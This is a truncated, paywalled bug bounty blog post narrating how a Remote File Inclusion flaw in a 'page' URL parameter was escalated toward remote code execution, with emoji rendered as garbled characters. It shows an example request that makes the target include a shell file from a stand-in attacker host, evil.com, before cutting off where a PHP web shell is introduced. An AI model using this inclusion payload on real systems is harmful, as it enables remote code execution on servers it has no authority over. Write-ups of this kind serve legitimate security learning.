Member-only story

๐Ÿ’ฐ How a Simple RFI Turned into a $300 RCE Jackpot โ€” A Hackerโ€™s Wild Ride! ๐Ÿš€

Krish_cyber
2 min read6 days ago

--

๐Ÿ”ฅ Introduction

Imagine sipping on coffee โ˜•, casually testing a website, when suddenly โ€” ๐Ÿ’ฅ BAM! โ€” you find an RFI vulnerability (Remote File Inclusion). Exciting, right? But what if that tiny spark of curiosity led you down a rabbit hole ๐Ÿ•ณ๏ธ, turning into Remote Code Execution (RCE) and earning you a sweet $300 bug bounty? ๐Ÿค‘ This is the story of how a simple vulnerability turned into an unforgettable hacking adventure! ๐ŸŽฏ

๐Ÿ”Ž Step 1: The Accidental Discovery

It all started on a lazy afternoon. ๐ŸŒค๏ธ I was exploring a bug bounty program when I stumbled upon a parameter in a URL:

**https://target.com/index.php?page=about.php**

This looked too good to be true! A page parameter? That screamed potential RFI. So, I did what any hacker would โ€” I tested it! ๐Ÿ•ต๏ธโ€โ™‚๏ธ

๐Ÿš€ Step 2: Exploiting the RFI

To confirm the vulnerability, I tried including a remote file:

**https://target.com/index.php?page=http://evil.com/shell.txt**

And guess what? The server fetched and executed my remote file! ๐ŸŽฏ That was a huge win! But I wasnโ€™t stopping there. ๐Ÿ›‘

โ˜ ๏ธ Step 3: From RFI to RCE

Since the server executed my remote file, I crafted a simple PHP web shell ๐Ÿš:

--

--

Krish_cyber
Krish_cyber

Written by Krish_cyber

hii I'm krishna passionate cybersecurity enthusiast and aspiring bug bounty hunter, dedicated to ethical hacking and securing digital system.

No responses yet